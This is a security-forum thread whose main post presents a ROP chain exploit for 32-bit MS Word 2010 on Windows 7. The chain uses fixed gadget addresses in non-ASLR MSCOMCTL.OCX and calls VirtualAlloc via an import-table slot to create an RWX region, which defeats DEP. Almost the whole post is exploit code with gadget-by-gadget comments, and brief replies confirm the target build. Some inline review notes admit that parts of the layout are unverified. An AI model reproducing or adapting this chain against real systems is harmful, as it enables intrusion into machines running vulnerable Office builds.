
Thread: Bypassing DEP using VirtualAlloc for MS Word 2010 on Windows 7


    Bypassing DEP using VirtualAlloc for MS Word 2010 on Windows 7

    Exploit for MS Word 2010 (32-bit / x86 build; see reply #3).

    ASLR bypass: every gadget and pointer below is taken from MSCOMCTL.OCX, which in the build targeted here is loaded without ASLR at a fixed base, so its addresses can be hard-coded. The chain is therefore tied to that one module build; any other version (including later, ASLR-enabled releases of the control) invalidates all of the addresses.
    DEP bypass: the ROP chain calls VirtualAlloc() to obtain a PAGE_EXECUTE_READWRITE (RWX) region and then pivots the stack into the prepared call frame. The complete chain is in the code section below.

    #ROP CHAIN
    # RET "sled": five copies of a bare RET gadget in MSCOMCTL.OCX.  The value
    # 0x27581101 is written little-endian as the hex text "01115827"; each RET
    # simply pops the next dword and continues, so control only has to land
    # somewhere inside this run to reach the real chain that follows.
    # NOTE(review): 0x2758xxxx/0x2761xxxx addresses throughout this file assume
    # MSCOMCTL.OCX is mapped, unrelocated, at its preferred base -- presumably
    # 0x27580000 -- and are valid for one specific build only.
    control = "01115827" * 5  # 0x27581101 : RET  [Module: Mscomctl.OCX]
    
    #---------------- save the stack pointer into EAX (and EDX) ----------------#
    # PUSH ESP ... POP ESI copies the current ESP into ESI; MOV EAX,ESI moves it
    # to EAX; XCHG EAX,EDX followed by MOV EAX,EDX leaves the same value in both
    # EAX and EDX.  No gadget in this segment writes EDI -- the original heading
    # said "EAX & EDI", presumably a typo for EDX.
    # The first gadget also executes MOV ECX,[ESI] and MOV [EDX],ECX as side
    # effects, so ESI must point at readable and EDX at writable memory when the
    # chain starts (whatever registers hold at the moment of the pivot is not
    # shown here).
    # Filler accounting: "RETN 8" of the first gadget skips the two dwords after
    # the second gadget's address; that gadget's POP ESI / POP EBP then consume
    # the next two.  The trailing "ADD ESP,14 # RET 4" skips 0x18 bytes (six
    # dwords) after itself -- presumably the VirtualAlloc frame defined next.
    rop = "".join([
        "56455a27",  # 0x275A4556 : PUSH ESP # AND AL,8 # MOV ECX,[ESI] # MOV [EDX],ECX # POP ESI # RETN 8
        "b8b25827",  # 0x2758B2B8 : MOV EAX,ESI # POP ESI # POP EBP # RET
        "42424242",  # filler (skipped by RETN 8)
        "43434343",  # filler (skipped by RETN 8)
        "44444444",  # filler (popped into ESI)
        "41414141",  # filler (popped into EBP)
        "c21a5827",  # 0x27581AC2 : XCHG EAX,EDX # RET
        "5e7f6127",  # 0x27617F5E : MOV EAX,EDX # RET 4
        "810a5b27",  # 0x275B0A81 : ADD ESP,14 # RET 4
    ])
    
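    #------------------- VirtualAlloc() call frame (reached by the final pivot) ------------------#
    # Stack image of a stdcall VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
    # call: the gadget that transfers control, the return address, then the four arguments.
    # The two 0x4x dwords are placeholders, not final values: rop1/rop2 below store a
    # stack-derived address through "MOV DWORD PTR DS:[ECX+2C],EAX", presumably into these
    # slots (the exact target depends on the final layout, which is not shown here).
    # EDI is loaded with the VirtualAlloc pointer by rop2 (MOV EAX,[IAT slot] / XCHG EAX,EDI)
    # before the chain pivots ESP onto this frame, so JMP EDI is the actual call.
    VP  = "a42f5827"  # 0x27582FA4 : JMP EDI  -> VirtualAlloc()
    VP += "42424242"  # return address    (placeholder, patched by the chain)
    VP += "43434343"  # lpAddress         (placeholder, patched by the chain)
    VP += "01000000"  # dwSize            = 0x1
    VP += "00100000"  # flAllocationType  = 0x1000 (MEM_COMMIT) -- was mislabelled "SIZE 1000"
    VP += "40000000"  # flProtect         = 0x40 (PAGE_EXECUTE_READWRITE, i.e. RWX)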
    
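    #--------------------     Setting 1st Parameter   --------------------------------------#
    # Computes a stack-relative address and stores it into the VirtualAlloc frame.
    # XCHG EAX,ECX moves the saved stack pointer into ECX; MOV EAX,EDX restores it
    # into EAX; five DEC ECX adjust the store base; POP ESI loads 0x114 and
    # ADD EAX,ESI advances EAX by it; the two MOV [ECX+2C],EAX gadgets perform the
    # store (presumably into the placeholder slots of the VirtualAlloc frame).
    # NOTE(review): the first gadget's "...." hides instructions, so whether the
    # nine filler dwords are all skipped by its RETN 24 (0x24 bytes) or partly
    # consumed by hidden POPs cannot be confirmed from this listing.
    # NOTE(review): "ADD EAX,ESI # POP ESI # RETN 8" pops the dword after it --
    # the first MOV gadget's address -- into ESI and returns to the second copy,
    # then skips 8 bytes; if rop2 follows directly, those are its two leading
    # filler dwords.
    rop1  = "869c5927"  # 0X27599C86 : XCHG EAX,ECX # .... # RETN 24
    rop1 += "5e7f6127"  # 0X27617F5E : MOV EAX,EDX # RET 4
    rop1 += "5e7f6127"  # 0X27617F5E : MOV EAX,EDX # RET 4
    rop1 += "5e7f6127"  # 0X27617F5E : MOV EAX,EDX # RET 4
    rop1 += "51515151"  # filler
    rop1 += "52525252"  # filler
    rop1 += "53535353"  # filler
    rop1 += "54545454"  # filler
    rop1 += "55555555"  # filler
    rop1 += "56565656"  # filler
    rop1 += "57575757"  # filler
    rop1 += "58585858"  # filler
    rop1 += "41414141"  # filler
    rop1 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop1 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop1 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop1 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop1 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop1 += "32ad5827"  # 0x2758AD32 : POP ESI # RETN
    rop1 += "14010000"  # 0x00000114 : popped into ESI -- the addend for ADD EAX,ESI, NOT padding
    rop1 += "4d2d5f27"  # 0X275F2D4D : ADD EAX,ESI # POP ESI # RETN 8
    rop1 += "b6b35a27"  # 0X275AB3B6 : MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4   (popped into ESI by the gadget above)
    rop1 += "b6b35a27"  # 0X275AB3B6 : MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4   (the store that actually runs)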
    
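    #--------------------     Setting 2nd Parameter   --------------------------------------#
    # Second store into the VirtualAlloc frame: ECX is decremented five more times
    # and EAX (still the value computed in rop1) is written through [ECX+2C].
    # The two leading dwords are skipped by the "RETN 8" at the end of rop1 when
    # rop2 follows it directly.
    rop2  = "41414141"  # filler (skipped by rop1's trailing RETN 8)
    rop2 += "42424242"  # filler (skipped by rop1's trailing RETN 8)
    rop2 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA : DEC ECX # RETN
    rop2 += "b6b35a27"  # 0X275AB3B6 : MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4

    #------------------------- Fetch & Call VirtualAlloc() address  ----------------------#
    # 0x275811C8 is NOT VirtualAlloc itself: it is an import-table slot inside
    # MSCOMCTL.OCX that holds the kernel32!VirtualAlloc pointer, which is why the
    # chain dereferences it (MOV EAX,[EAX]) right after loading it.  Reading the
    # pointer at run time is what keeps the chain independent of kernel32's
    # ASLR'd base; only MSCOMCTL.OCX needs to be unrelocated.
    # The slot address appears twice because the preceding gadget's "RETN 4"
    # skips the first copy; POP EAX then consumes the second.
    # The final XCHG EAX,ESP pivots ESP to (saved stack pointer + 0x20), where
    # the VirtualAlloc frame (VP) is expected to sit; the RETN of that gadget
    # then pops VP's first dword, JMP EDI, with EDI already holding VirtualAlloc.
    rop2 += "a40d5927"  # 0X27590DA4 : POP EAX # RETN
    rop2 += "c8115827"  # 0X275811C8 : IAT slot -> kernel32.VirtualAlloc  (skipped by the RETN 4 above)
    rop2 += "c8115827"  # 0X275811C8 : IAT slot -> kernel32.VirtualAlloc  (popped into EAX)
    rop2 += "6c0b5e27"  # 0X275E0B6C : MOV EAX,DWORD PTR DS:[EAX] # RETN   -> EAX = VirtualAlloc
    rop2 += "46ea5927"  # 0X2759EA46 : XCHG EAX,EDI # RETN                 -> EDI = VirtualAlloc
    rop2 += "c21a5827"  # 0X27581AC2 : XCHG EAX,EDX # RETN                 -> EAX = saved stack pointer (from EDX)
    rop2 += "32ad5827"  # 0X2758AD32 : POP ESI # RETN
    rop2 += "20000000"  # 0x00000020 : popped into ESI -- offset added to the saved stack pointer, NOT padding
    rop2 += "4d2d5f27"  # 0X275F2D4D : ADD EAX,ESI # POP ESI # RETN 8
    rop2 += "42424242"  # filler (popped into ESI by the gadget above)
    rop2 += "ee8b5927"  # 0X27598BEE : XCHG EAX,ESP # RETN                 -> stack pivot onto the VirtualAlloc frame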
    Last edited by w@rri0r@bh@y; 03-02-2014 at 07:54 PM.

    Excellent post, mate — expecting more from you. One doubt: does Word 2010 install the 32-bit or the 64-bit version by default?


    Quote Originally Posted by fb1h2s View Post
    Excellent post mate expecting more form you. One doubt does Word 2010 install a 32 bit version or 64 bit version by default ?
    It's for Word 2010 x86 (the 32-bit version); the gadget addresses above are only valid for that build.
